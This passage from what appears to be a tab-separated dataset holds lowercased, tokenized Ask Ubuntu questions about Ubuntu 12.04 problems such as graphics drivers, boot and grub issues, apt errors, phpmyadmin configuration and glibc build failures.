/var/cache/apt/archives/gnome-shell-extensions_3.4.1~git20120508.dfd7191a-0ubuntu1~12.04~ricotz0_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) update : fixed that . now gnome tweak tool shows me an exclamation mark beside the extension enable button , saying `` extension does n't support shell version '' . my gnome shell is already the latest version . help !
143151	12.04 is not detecting onboard intel gma 950 ! need to install driver manually !	my motherboard model is asus p5gc-mx/1333 and built in graphics card is intel gma950 . unfortunately , ubuntu 12.04 is not detecting on board graphics card . display option under settings menu is showing unknown hardware , therefore , default resolution is always 1024*768 and fonts are not clear and sometimes fuzzy . my question is , how can i install driver for intel gma 950 manually ? so , that i can fix screen resolution . thank you in anticipation .
143154	ca n't upgrade from 11.10 to 12.04 due to low disk space in /	i am unable to upgrade from 11.10 to 12.04 because of low disk space in my root / partition . any help ? i already have a 6 gb drive mounted on / . i do not understand why there is a memory issue .
143162	is it possible to write programs for other oss in ubuntu ?	is there an integrated developemnt environment ( ide ) that enables us to write programs for windows and mac in ubuntu ?
143170	install ubuntu 12.04 in dell inspiron 1420	i want to install ubuntu 12.04 on a dell inspiron 1420 . currently that system has windows vista installed on it . after installing ubuntu , do i need to install all drivers separately ?
143172	in unity , the folder containing a file selected in the dash is opened in nautilus instead of opening the file with the corresponding application	in 12.04 , since yesterday the behavior of the dash in unity has changed . previously ( and i assume it is the default choice ) , when selecting a file in the dash , the file was automatically opened with its corresponding application . now , the folder containing the file is opened in nautilus instead . ( i have to mention that i have installed xfce ) how do i revert to the first behaviour ? thanks .
143176	overlayfs reload with multiple layers ( migration away from aufs )	i 've come across one of those aufs to overlayfs migration headaches . with aufs you could specify multiple ro-layers and updating some files in them was refreshed with remount . fstab with aufs : aufs /etc aufs noauto , br : /rw-root/etc=rw : /ro-root/etc=ro : /etc=rr 0 0 same functionality with overlayfs : none /.tmp-root/etc overlayfs noauto , upperdir=/ro-root/etc , lowerdir=/etc 0 0 none /etc overlayfs noauto , upperdir=/rw-root/etc , lowerdir=/.tmp-root/etc 0 0 mounting the system in order is fine and everything works . the problem arises when i need to update something on the ro-root partition . running remount on that sees /etc as the already mounted overlayfs and not the original ro-root . ( solved the striked-out problem with mount -- bind ) apparently the problem is with inode numbers of the files . so editing of a file works fine , but if i copy a new file over the old one on the lower level , the change is not propagated . so this could be a real overlayfs problem . i 'd really like this setup to continue working ( restructuring everything is quite a lot of work and testing that i 'd rather avoid , because this affects +50 virtualmachines ) . that being said , i will also accept answers that would accomplish moving readonly-root after initrd-stage safely to go around this problem and if that 's not possible then suggestion most minimalistic way of changing/modifying/creating initrd to accomplish this move . there 's another related question , but it 's the simpler form of just two layers . simple overlayfs reload question
143177	usb needed to boot ubuntu after successful installation	similar problem my problem is very much like the problem described in the link . i have freedos and ubuntu 12.04 . when i boot without bootable usb the computer simply proceeds to dos . with usb stick i have to enter ubuntu via bios . i wish to reinstall ubuntu . what is the procedure to reinstall ubuntu from ubuntu itself ? or is there any other solution to the problem ?
143179	startx does n't work	let 's see , i can not log in in lubuntu 12.04 . on the shell i get when typing startx : _xservtranssocketunixcreatelistener : ... socketcreatelistener ( ) failed _xservtransmakea11c0tsserverlisteners : server already running fatal server error : can not establich any listening sockets - make sure an x server is n't already running ... please also check the log file at `` /var/log/xorg.0.log '' for additional information . ddxsiggiveup : closing log server terminated with error ( 1 ) . closing log file invalid mit-magic-cookie-1 keyinvalid mit-magic-cookie-1 keyxinit : giving up xinit : unable to connect to x server : resource temporarily unavailable xinit : server error before i had only read-right on the file-system with sudo autoremove i got my write-rights back . i removed the .xauthority* files in /home/username . still can not login back
143185	phpmyadmin not working	i recently installed phpmyadmin onto ubuntu server 10.04 using sudo apt-get install phpmyadmin the installation went fine and everything was working including phpmyadmin . i then performed a restart of the server and now apache2 starts up but when i navigate to http : //192.168.1.72/phpmyadmin/ i am getting a 403 error . i have included /etc/phpmyadmin/apache.conf file in /etc/apahe2/apache2.conf file /etc/phpmyadmin/apache.conf # phpmyadmin default apache configuration alias /phpmyadmin /usr/share/phpmyadmin < directory /usr/share/phpmyadmin > options followsymlinks directoryindex index.php < ifmodule mod_php5.c > addtype application/x-httpd-php .php php_flag magic_quotes_gpc off php_flag track_vars on php_flag register_globals off php_value include_path . < /ifmodule > < /directory > # authorize for setup < directory /usr/share/phpmyadmin/setup > < ifmodule mod_authn_file.c > authtype basic authname `` phpmyadmin setup '' authuserfile /etc/phpmyadmin/htpasswd.setup < /ifmodule > require valid-user < /directory > # disallow web access to directories that do n't need it < directory /usr/share/phpmyadmin/libraries > order deny , allow deny from all < /directory > < directory /usr/share/phpmyadmin/setup/lib > order deny , allow deny from all < /directory > the only change that was made since phpmyadmin was installed was that timetrex was installed . is there anyway to manually start phpmyadmin or should it already be working once apache started ?
143187	how do i add text to an animated .gif in gimp ?	i have just worked out how to create an animated.gif in gimp but i am having a problem adding text . when i create/add the text box and then save my.gif and view it , the text only flashes up over one frame/layer . how do i make the text last over the entire duration of the animated.gif ? if you could explain in very simple terms , with the easiest solution , that would be wonderful as i am quite new to all this and very unsure of what i am doing ! thank you for any help you can give .
143189	how to enable relro support ?	we have been trying to build a lfs system on 12.04 64-bit . in the configuration stage of glibc , i receive the error configure : error : linker with -z relro support required how can i enable the relro support ? /media/lfs/sources/glibc-build $ ../glibc-2.15/configure \ > -- prefix=/tools \ > -- host= $ lfs_tgt \ > -- build= $ ( ../glibc-2.15/scripts/config.guess ) \ > -- disable-profile \ > -- enable-add-ons \ > -- enable-kernel=2.6.25 \ > -- with-headers=/tools/include \ > libc_cv_forced_unwind=yes \ > libc_cv_ctors_header=yes \ > libc_cv_c_cleanup=yes checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-lfs-linux-gnu checking for x86_64-lfs-linux-gnu-gcc ... x86_64-lfs-linux-gnu-gcc checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether x86_64-lfs-linux-gnu-gcc accepts -g ... yes checking for x86_64-lfs-linux-gnu-gcc option to accept iso c89 ... unsupported checking for gcc ... gcc checking how to run the c preprocessor ... x86_64-lfs-linux-gnu-gcc -e checking for x86_64-lfs-linux-gnu-g++ ... no checking for x86_64-lfs-linux-gnu-c++ ... no checking for x86_64-lfs-linux-gnu-gpp ... no checking for x86_64-lfs-linux-gnu-acc ... no checking for x86_64-lfs-linux-gnu-cc ... no checking for x86_64-lfs-linux-gnu-cxx ... no checking for x86_64-lfs-linux-gnu-cc++ ... no checking for x86_64-lfs-linux-gnu-cl.exe ... no checking for x86_64-lfs-linux-gnu-fcc ... no checking for x86_64-lfs-linux-gnu-kcc ... no checking for x86_64-lfs-linux-gnu-rcc ... no checking for x86_64-lfs-linux-gnu-xlc_r ... no checking for x86_64-lfs-linux-gnu-xlc ... no checking for g++ ... g++ configure : warning : using cross tools not prefixed with host triplet checking whether we are using the gnu c++ compiler ... yes checking whether g++ accepts -g ... yes configure : running configure fragment for add-on libidn configure : running configure fragment for add-on nptl checking for assembler gnu_indirect_function symbol type support ... yes checking whether .text pseudo-op must be used ... yes checking for assembler global-symbol directive ... .globl checking for assembler .type directive prefix ... @ checking sysdep dirs ... sysdeps/x86_64/elf nptl/sysdeps/unix/sysv/linux/x86_64 sysdeps/unix/sysv/linux/x86_64 sysdeps/unix/sysv/linux/wordsize-64 nptl/sysdeps/unix/sysv/linux nptl/sysdeps/pthread sysdeps/pthread sysdeps/unix/sysv/linux sysdeps/gnu sysdeps/unix/common sysdeps/unix/mman sysdeps/unix/inet nptl/sysdeps/unix/sysv sysdeps/unix/sysv sysdeps/unix/x86_64 nptl/sysdeps/unix sysdeps/unix sysdeps/posix sysdeps/x86_64/fpu/multiarch sysdeps/x86_64/fpu sysdeps/x86_64/multiarch nptl/sysdeps/x86_64 sysdeps/x86_64 sysdeps/wordsize-64 sysdeps/ieee754/ldbl-96 sysdeps/ieee754/dbl-64/wordsize-64 sysdeps/ieee754/dbl-64 sysdeps/ieee754/flt-32 sysdeps/ieee754 sysdeps/generic/elf sysdeps/generic checking for a bsd-compatible install ... /usr/bin/install -c checking whether ln -s works ... yes checking whether /media/lfs/tools/bin/../lib/gcc/x86_64-lfs-linux-gnu/4.7.0/../../../../x86_64-lfs-linux-gnu/bin/as is gnu as ... yes checking whether /media/lfs/tools/bin/../lib/gcc/x86_64-lfs-linux-gnu/4.7.0/../../../../x86_64-lfs-linux-gnu/bin/ld is gnu ld ... yes checking for /media/lfs/tools/bin/../lib/gcc/x86_64-lfs-linux-gnu/4.7.0/../../../../x86_64-lfs-linux-gnu/bin/as ... /media/lfs/tools/bin/../lib/gcc/x86_64-lfs-linux-gnu/4.7.0/../../../../x86_64-lfs-linux-gnu/bin/as checking version of /media/lfs/tools/bin/../lib/gcc/x86_64-lfs-linux-gnu/4.7.0/../../../../x86_64-lfs-linux-gnu/bin/as ... 2.22 , ok checking for /media/lfs/tools/bin/../lib/gcc/x86_64-lfs-linux-gnu/4.7.0/../../../../x86_64-lfs-linux-gnu/bin/ld ... /media/lfs/tools/bin/../lib/gcc/x86_64-lfs-linux-gnu/4.7.0/../../../../x86_64-lfs-linux-gnu/bin/ld checking version of /media/lfs/tools/bin/../lib/gcc/x86_64-lfs-linux-gnu/4.7.0/../../../../x86_64-lfs-linux-gnu/bin/ld ... 2.22 , ok checking for pwd ... /bin/pwd checking for x86_64-lfs-linux-gnu-gcc ... ( cached ) x86_64-lfs-linux-gnu-gcc checking version of x86_64-lfs-linux-gnu-gcc ... 4.7.0 , ok checking for gnumake ... no checking for gmake ... no checking for make ... make checking version of make ... 3.81 , ok checking for gnumsgfmt ... no checking for gmsgfmt ... no checking for msgfmt ... msgfmt checking version of msgfmt ... 0.18.1 , ok checking for makeinfo ... no checking for sed ... sed checking version of sed ... 4.2.1 , ok checking for x86_64-lfs-linux-gnu-readelf ... x86_64-lfs-linux-gnu-readelf checking for autoconf ... autoconf checking whether autoconf works ... yes configure : warning : *** these auxiliary programs are missing or incompatible versions : makeinfo *** some features will be disabled . *** check the install file for required versions . checking ld_library_path variable ... ok checking whether gcc supports -static-libgcc ... -static-libgcc checking for bash ... /bin/bash checking for gawk ... no checking for mawk ... mawk checking for perl ... /usr/bin/perl checking for install-info ... /usr/bin/install-info checking for bison ... no checking for signed size_t type ... no checking for libc-friendly stddef.h ... yes checking whether we need to use -p to assemble .s files ... no checking for .set assembler directive ... yes checking for assembler gnu_unique_object symbol type ... yes checking for .symver assembler directive ... yes checking for ld -- version-script ... yes checking for .previous assembler directive ... yes checking for .protected and .hidden assembler directive ... yes checking whether __attribute__ ( ( visibility ( ) ) ) is supported ... yes checking for broken __attribute__ ( ( visibility ( ) ) ) ... no checking for broken __attribute__ ( ( alias ( ) ) ) ... no checking whether to put _rtld_local into .sdata section ... no checking for .preinit_array/.init_array/.fini_array support ... yes checking whether to use .ctors/.dtors header and trailer ... ( cached ) yes checking for libunwind-support in compiler ... no checking for -z nodelete option ... yes checking for -z nodlopen option ... yes checking for -z initfirst option ... yes checking for -z relro option ... no configure : error : linker with -z relro support required
143192	how can i replace lightdm with mdm ?	linux mint cinnamon 1.4 released with `` mdm display manager '' . it is based on the code of gdm2.20 . it provides : graphical configuration tools themeability remote , automatic and timed login event scripting language selection and it comes with more features than any other display manager currently available . ( mdm ) so how can i use mdm instead of lightdm on ubuntu ?
143196	how to add a python script as an executable shortcut to launcher ?	i have managed to add .sh files as launcher shortcuts . now , i want to add a python script in the launcher as shortcut . i want it to be executed like when it would get executed in the terminal when the following command is run : python pythonscript.py can it also be added in the launcher ? how can i do it ?
143203	how to disable a particular ppa ?	i want to lock updating from the ppa : ricotz/testing repository . i do n't want to purge it . i just want to lock the updates from that repository . how do i do it ?
143207	how to make ctrl-alt-num 4 and 6 shortcuts work ?	window placement ctrl-alt-num 4 - place window on the left side of the screen . ctrl-alt-num 6 - place window on the right side of the screen . how to make these two shortcuts work . this wallpaper contains these two shortcuts .
143208	unable to enable wireless on lenovo 3000 v200	i 've just installed 11.10 on an old lenvo laptop . all the way through the install process the wireless light was lit . as soon as i reboot the light goes out . in network the section to aircraft mode is set to on so i turn this off . i turn on wireless and the indicator light comes on for a second , and then it turns its self off again . name : lenovo 3000 v200 processor : intel core 2 duo t7300 2ghz screen : 12.1â wxga ram : 2gb hdd : 120gb optical drive : dvd+-rw,2layer graphics : intel graphics media accelerator 965 network : 10/100 ethernet , intel 4965 802.11agn wireless , bluetooth other : 3 x usb2.0 , 1 x firewire
143214	with nvidia proprietrary drivers can not choose monitor launcher appears on	it 's awesome that unity now let you choose in which monitor you want the unity launcher to apear . however , once i 've install the nvidia privative drivers i ca n't chose anymore . i force what normally is my secondary monitor as a primary so that the launcher appears on it . is there a way to fix this , without having to set as primary the monitor where you want the launcher to apear ? i doubt there is a graphical solution , but what file do i need to edit ?
143217	system freezes unexpectedly at some point	i am having issues running the latest installation . i tried the liveâ cd and everything seems to go fine for a while and then the whole system freezes and i ca n't do anything . it does not recover and i have to turn the computer off using the power button . i have also tried the installer a couple of times and get the same problem . everything seems to be going well and then all of a sudden it freezes . it does not freeze at the same point either , as in the installation got to different points each time i tried before freezing . i was thinking my hardware may be causing the problem . it 's a desktop with : motherboard : asrock n68-vs3 fx , graphics card : nvidia geforce 210 , tp-link wireless card , 4gb ram , 1tb hard drive
143218	ca n't boot into ubuntu after installation failed	yesterday , i installed the new version of ubuntu ( 12.04 ) but in the middle of the installation , it gave me an error and did n't install the rest . when i restarted my computer , i booted into ubuntu , but it did n't do anything â just went black . i restarted my computer again , and when i tried to uninstall ubuntu ( with windows vista ) the same happened . it did not work . i tried to just delete it or use ccleaner , but it did n't work either .
143219	how to run multiple instances of tickr	see the bottom of tickr help . i have problems running multiple instances of the program `` tickr '' . however , i found a 'solution ' on their website ( link top ) , but it is too advanced for me . the problem is that i do n't know what to with this provided line : /usr/bin/tickr -instance-id=1 -win_y=200 & /usr/bin/tickr -instance-id=2 -win_y=250 and if i were to figure out how to use it , i would still not know how to run the multiple instances . can anyone provide a little easier walkthrough ?
143221	how to set up google chrome as default browser in xubuntu	i use xubuntu 12.04 . i uninstalled firefox and now use google chrome version 19.xxx . to solve this problem , i tried : galternatives the `` default apps '' under settings and sudo update-alternatives -- config x-www-browser neither of these worked . does anybody have an alternative solution for this ? -- > solution : i used the `` sudo gedit /usr/share/applications/defaults.list '' tip from 天使の and searched for firefox in the whole document ! everytime i found `` firefox '' i replaced it with `` google-chrome.desktop '' . i also used the `` default apps '' menu to change it to google-chrome . and now it works.. i hope it helps some other ; - )
143222	how to monitor multiple jvm using nagios ?	i am looking for a way to monitor jvm , especially for memory usage , so i can restart the services when this is required . this has to work while having multiple jvms running on the same machine .
143231	maas not working	i 'm trying a whole week to make mass to work , but no results . this is the procedure : maas createsuperuser sudo apt-get install maas-dhcp maas-import-isos apt-get install maas-enlist tftpd-hpa maas-import-isos after this i start node machine with pxe as default first boot device , and select option maas-enlist . sistem start to installing some things , and after that on maas webui stand 1 node . but when i click on node button on webui or refresh page , it show 0 node . command cobbler system list showing : root @ maas-serv : ~ # cobbler system list default node-3ee116ea-a8b2-11e1-a735-50e549e38206 also , sometime this procedure register one node , but when registering second one , same problem like i described up . root @ maas-serv : /var/lib/tftpboot/pxelinux.cfg # is empty , only default is there . on command maas-import-isos there is a one warning . ftpboot/images/precise-x86_64-maas-ephemeral/initrd copying images generating gpxe/pxe configuration files generating pxe menu structure warning : kernel option length exceeds 255 warning : kernel option length exceeds 255 warning : kernel option length exceeds 255 warning : kernel option length exceeds 255 copying files for distro : precise-x86_64
143237	clonning a dual boot hdd	i have a laptop with 320 gb hdd running win7/fedora 16 . this is what i wan na do . clone the 320 gb hdd to a 500 gb hdd , keep the windows partition as it is , wipe out fedora 16 and install ubuntu 12.04 with the remainder of the drive . i also have a desktop which has ubuntu 12.04 installed with plenty of empty sata ports and cables . elegant way to accomplish this ?
143242	how to recover grub after installing windows next to ubuntu in netbook ( no optical drive )	i have ubuntu12.04 and win7 on my netbook . now i 'm going to install winxp instead of 7 but i have no optical drive to use ubuntu livecd and i know if i do this , my grub will go.. the only way is by using my flash but how ? ? ..
143243	where is easus coming from ?	i have downloaded the universal usb installer and ubuntu 12.04 desktop as described on your site . i installed it to a 16gb usb stick including the format option . now when i try to boot from the stick into ubuntu i get a couple of lines of script then a screen with easus todo backup with backup . recovery , clone and tools options , but no sign of ubuntu starting . where is the start ubuntu option please ? i can find no reference to easeus on your help pages .
143245	movie player wo n't play mp4 , gxine does	i 've recently installed ubuntu 12.04 . i have installed ubuntu-restricted-extras and ubuntu-restricted-addons , gstreamer0.10-ffmpeg , libdvdread4 , libdvdcss2 , run the .sh script , and i do n't remember what all other packages ( but from many tutorials , installed from here and other sources ) . i have mp4 files that play in gxine , but not in movie player . most of the help i see suggests that when this problem crops up , to switch to vlc , gxine , or other player . but i 'd like to fix movie player to work with these files so i can use a single , easy-to-use player , and not have to rely on other tools . can somebody help ?
143248	two notifications for empathy and no notification preferences tab ?	i am getting an issue with empathy . when i am in a chat every time i send a message i get a standard gnome-shell notification echoing what i just set , the same applies for when a message is received . after this notification disappears a second one pops up , being the empathy notification that allows me to reply . after doing some google searches i am being told to disable the bubble notifications in the empathy preferences under notifications . issue being , i do n't have a notifications tab . what 's up with that ?
143250	dual monitors show white background and mouse pointer with x shape	i have a clean install of ubuntu 12.04 on my lenovo thinkpad t61 . my graphics card is an nvidia corporation g86 ( quadro nvs 140m ) . i have installed an additional driver for nvidia . when i go to nvidia 's x server settings interface â x server display configuration , i can detect my other monitor ( benq fp222w ) but neither or twinview or x separate are working fine . it shows a white background and my mouse pointer with a big `` x '' shape . in ubuntu 11.10 it was working fine . i clicked `` save to x configuration file '' , logged out , restarted the graphical service ( lightdm ) . i also restarted the computer , but it did not help . i even enabled not the recommended version of nvidia driver , no success . what you fellows think ?
143253	how can i enable thumbnails on xubuntu desktop ?	i ca n't see any thumbnails on my desktop . if i use thurnar directly and browse to the desktop , thumbnails of pdf , jpg and odt are displayed , but on my desktop its just plain . how can i fix that ? i 'm facing the problem on 2 different laptops .
143260	xfce4-power-manager keeps restarting after suspend	in a clean install of xubuntu 12.04 , the xfce4-power-manager keeps restarting after suspend . if i quit the program and restart it , it keeps restarting . if i quit the program and restartit a few minutes later it starts working . i do n't know what log to watch for problems .
143262	how to install a brother mfc-5890cn scanner/printer	i had my brother mfc-5890cn scanner/printer working with ubuntu 10.* . now that i have upgraded to 12.04 lts , the printer is still working but my scanner fails .
143267	ubuntu 12.04 based distros desktop crashes with `` could not write byte : broken pipes ''	i enjoy using second life and osgrid . but every viewer i have tried crashes the desktop with the same error . when i get the error `` could not write byte : broken pipes '' it resets back to the login screen . i do not have an nvidia video card . i have intel hd 945 . the crashes i get are exactly as described in several bug reports on the nvidia drivers . could not write byte : broken pipes my hardware is a sony vaio vpcea24fm 4 gb ram , intel hd graphics . i already tried : linux mint 13 maya cinnamon and mate kubuntu xubuntu ubuntu … all based on 12.04 . they all crash the desktop – whether i use the second life viewer , imprudence or singularity . i have regressed my system to 11.10 and have no issues . never had any issues until i updated and it was a clean install using the above mentioned distros .
143268	unable to start virtualbox	probably due to lack of space of hard disk my win7 virtual machine does not starts ( failed to start virtual machine ) the .vbox file seems to be corrupted ( not closed tags ) : http : //pastebin.com/j9ntqfgh here 's the log file : http : //pastebin.com/gusad7g9 after closing the tags and creating new virtual machine with the old win7 image windows does not boots up . how to fix this and restore the date i have on that machine ?
143270	brightness setting not remembered after boot -- rc.local `` fix '' not working	using lenovo x220 laptop . i installed 12.04 on it . every time i boot the display 's brightness sets to the highest setting : maximum_brightness 15 . this is way too bright and want to set it to 4 . i have spent a long time trying to fix this . tried editing rc.local file by adding the `` echo 0 > '' line before exit 0 . but it never works . laptop always resets to level 15 after boot . i tried everything here : desktop does n't remember brightness settings after a reboot why is n't rc.local working for me ? does anyone know how i can edit the maximum_brightness down ? can i set a lower maximum_brightness ?
143277	the size of apt get update list is too big everytime ?	in ubuntu 12.04 , the following packages are fetched every time i run sudo apt-get update . dear ubuntu experts please tell me how to stop this . ranjeet @ ubuntu : ~ $ sudo apt-get update ign http : //dl.google.com stable inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease get:1 http : //dl.google.com stable release.gpg [ 198 b ] ign http : //security.ubuntu.com precise-security inrelease ign http : //archive.ubuntu.com precise inrelease ign http : //archive.ubuntu.com precise-updates inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease get:2 http : //dl.google.com stable release [ 1,347 b ] ign http : //ppa.launchpad.net precise release.gpg get:3 http : //security.ubuntu.com precise-security release.gpg [ 198 b ] get:4 http : //archive.ubuntu.com precise release.gpg [ 198 b ] hit http : //ppa.launchpad.net precise release.gpg ign http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release.gpg get:5 http : //security.ubuntu.com precise-security release [ 49.6 kb ] get:6 http : //archive.ubuntu.com precise-updates release.gpg [ 198 b ] hit http : //ppa.launchpad.net precise release.gpg get:7 http : //archive.ubuntu.com precise release [ 49.6 kb ] ign http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release ign http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release ign http : //ppa.launchpad.net precise/main translationindex ign http : //ppa.launchpad.net precise/main translationindex get:8 http : //security.ubuntu.com precise-security/restricted sources [ 14 b ] hit http : //ppa.launchpad.net precise/main sources get:9 http : //archive.ubuntu.com precise-updates release [ 49.6 kb ] hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages get:10 http : //security.ubuntu.com precise-security/universe sources [ 4,522 b ] get:11 http : //security.ubuntu.com precise-security/multiverse sources [ 696 b ] get:12 http : //security.ubuntu.com precise-security/main sources [ 12.6 kb ] hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages get:13 http : //security.ubuntu.com precise-security/restricted amd64 packages [ 14 b ] get:14 http : //security.ubuntu.com precise-security/universe amd64 packages [ 10.3 kb ] get:15 http : //security.ubuntu.com precise-security/multiverse amd64 packages [ 1,142 b ] get:16 http : //security.ubuntu.com precise-security/main amd64 packages [ 42.8 kb ] hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex get:17 http : //archive.ubuntu.com precise/restricted sources [ 5,470 b ] get:18 http : //archive.ubuntu.com precise/universe sources [ 5,019 kb ] get:19 http : //security.ubuntu.com precise-security/restricted i386 packages [ 14 b ] get:20 http : //security.ubuntu.com precise-security/universe i386 packages [ 10.3 kb ] get:21 http : //dl.google.com stable/main amd64 packages [ 1,238 b ] get:22 http : //security.ubuntu.com precise-security/multiverse i386 packages [ 1,393 b ] get:23 http : //security.ubuntu.com precise-security/main i386 packages [ 43.9 kb ] get:24 http : //dl.google.com stable/main i386 packages [ 1,248 b ] ign http : //dl.google.com stable/main translationindex err http : //ppa.launchpad.net precise/main sources 404 not found err http : //ppa.launchpad.net precise/main amd64 packages 404 not found err http : //ppa.launchpad.net precise/main i386 packages 404 not found err http : //ppa.launchpad.net precise/main sources 404 not found err http : //ppa.launchpad.net precise/main amd64 packages 404 not found err http : //ppa.launchpad.net precise/main i386 packages 404 not found ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //dl.google.com stable/main translation-en_us ign http : //dl.google.com stable/main translation-en ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en hit http : //security.ubuntu.com precise-security/main translationindex hit http : //security.ubuntu.com precise-security/multiverse translationindex hit http : //security.ubuntu.com precise-security/restricted translationindex hit http : //security.ubuntu.com precise-security/universe translationindex hit http : //security.ubuntu.com precise-security/main translation-en hit http : //security.ubuntu.com precise-security/multiverse translation-en hit http : //security.ubuntu.com precise-security/restricted translation-en hit http : //security.ubuntu.com precise-security/universe translation-en get:25 http : //archive.ubuntu.com precise/multiverse sources [ 155 kb ] get:26 http : //archive.ubuntu.com precise/main sources [ 934 kb ] get:27 http : //archive.ubuntu.com precise/restricted amd64 packages [ 8,452 b ] get:28 http : //archive.ubuntu.com precise/universe amd64 packages [ 4,786 kb ] get:29 http : //archive.ubuntu.com precise/multiverse amd64 packages [ 119 kb ] get:30 http : //archive.ubuntu.com precise/main amd64 packages [ 1,273 kb ] get:31 http : //archive.ubuntu.com precise/restricted i386 packages [ 8,431 b ] get:32 http : //archive.ubuntu.com precise/universe i386 packages [ 4,796 kb ] get:33 http : //archive.ubuntu.com precise/multiverse i386 packages [ 121 kb ] get:34 http : //archive.ubuntu.com precise/main i386 packages [ 1,274 kb ] hit http : //archive.ubuntu.com precise/main translationindex hit http : //archive.ubuntu.com precise/multiverse translationindex hit http : //archive.ubuntu.com precise/restricted translationindex hit http : //archive.ubuntu.com precise/universe translationindex get:35 http : //archive.ubuntu.com precise-updates/restricted sources [ 1,379 b ] get:36 http : //archive.ubuntu.com precise-updates/universe sources [ 14.7 kb ] get:37 http : //archive.ubuntu.com precise-updates/multiverse sources [ 696 b ] get:38 http : //archive.ubuntu.com precise-updates/main sources [ 47.9 kb ] get:39 http : //archive.ubuntu.com precise-updates/restricted amd64 packages [ 2,417 b ] get:40 http : //archive.ubuntu.com precise-updates/universe amd64 packages [ 37.1 kb ] get:41 http : //archive.ubuntu.com precise-updates/multiverse amd64 packages [ 1,142 b ] get:42 http : //archive.ubuntu.com precise-updates/main amd64 packages [ 120 kb ] get:43 http : //archive.ubuntu.com precise-updates/restricted i386 packages [ 2,439 b ] get:44 http : //archive.ubuntu.com precise-updates/universe i386 packages [ 37.6 kb ] get:45 http : //archive.ubuntu.com precise-updates/multiverse i386 packages [ 1,393 b ] get:46 http : //archive.ubuntu.com precise-updates/main i386 packages [ 121 kb ] hit http : //archive.ubuntu.com precise-updates/main translationindex hit http : //archive.ubuntu.com precise-updates/multiverse translationindex hit http : //archive.ubuntu.com precise-updates/restricted translationindex hit http : //archive.ubuntu.com precise-updates/universe translationindex hit http : //archive.ubuntu.com precise/main translation-en hit http : //archive.ubuntu.com precise/multiverse translation-en hit http : //archive.ubuntu.com precise/restricted translation-en hit http : //archive.ubuntu.com precise/universe translation-en hit http : //archive.ubuntu.com precise-updates/main translation-en hit http : //archive.ubuntu.com precise-updates/multiverse translation-en hit http : //archive.ubuntu.com precise-updates/restricted translation-en hit http : //archive.ubuntu.com precise-updates/universe translation-en fetched 19.2 mb in 8min 59s ( 35.5 kb/s )
143280	after updating 12.04 login time has shooted up drastically ?	i updated ubuntu 12.04 yesterday . in that update firefox , thunderbird , kernel and snmp packages were updated . after this my login time has increased from 5-10sec to 30-45sec . i surely think it is the snmp packages that are causing trouble . how do i fix those packages to get back my login time ... ?
143287	system crash randomly while using adobe flash	my system crashes usually while using adobe flash intel® core™ i7-3770 cpu @ 3.40ghz × 8 intel® ivybridge desktop 64-bit 7.7 gb ram i found the following entries in the log before it did crash : may 28 15:46:15 lenny kernel : imklog 5.8.6 , log source = /proc/kmsg started . may 28 15:46:15 lenny rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 922 '' x-info= '' http : //www.rsyslog.com '' ] start may 28 15:46:15 lenny rsyslogd : rsyslogd 's groupid changed to 103 may 28 15:46:15 lenny rsyslogd : rsyslogd 's userid changed to 101 may 28 15:46:15 lenny rsyslogd-2039 : could not open output pipe '/dev/xconsole ' [ try http : //www.rsyslog.com/e/2039 ] may 28 15:46:15 lenny avahi-daemon [ 924 ] : avahi-daemon 0.6.30 starting up .
143292	getting data off a windows drive by booting with ubuntu	my question is very similar to this one : how do you repair an `` input/output error '' in an ntfs partition ? but i 've given up on repairing the drive , i really just want to be able to get a few files off . it 's a windows netbook , and i 'm booting off ubuntu on a thumbdrive . if i try to mount the volume , i get the error in the aforementioned post : error mounting : mount exited with exit code 13 : ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read ntfs $ bitmap : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows i got the netbook to load windows from a win 7 thumbdrive , and was able to run chkdsk , it completed , and indicated some failed sectors , etc. , but even after running that ubuntu still ca n't mount the volume . is there any way to just get a few files off this drive ?
143295	deleted apt sources.list file	i accidentally deleted my sources.list file in the apt folder and now none of my apt commands are working . i tried to download the list again but could n't find the link . i am using ubuntu 10.04 . can someone tell me how to tackle the issue or can give me the download the lists again ?
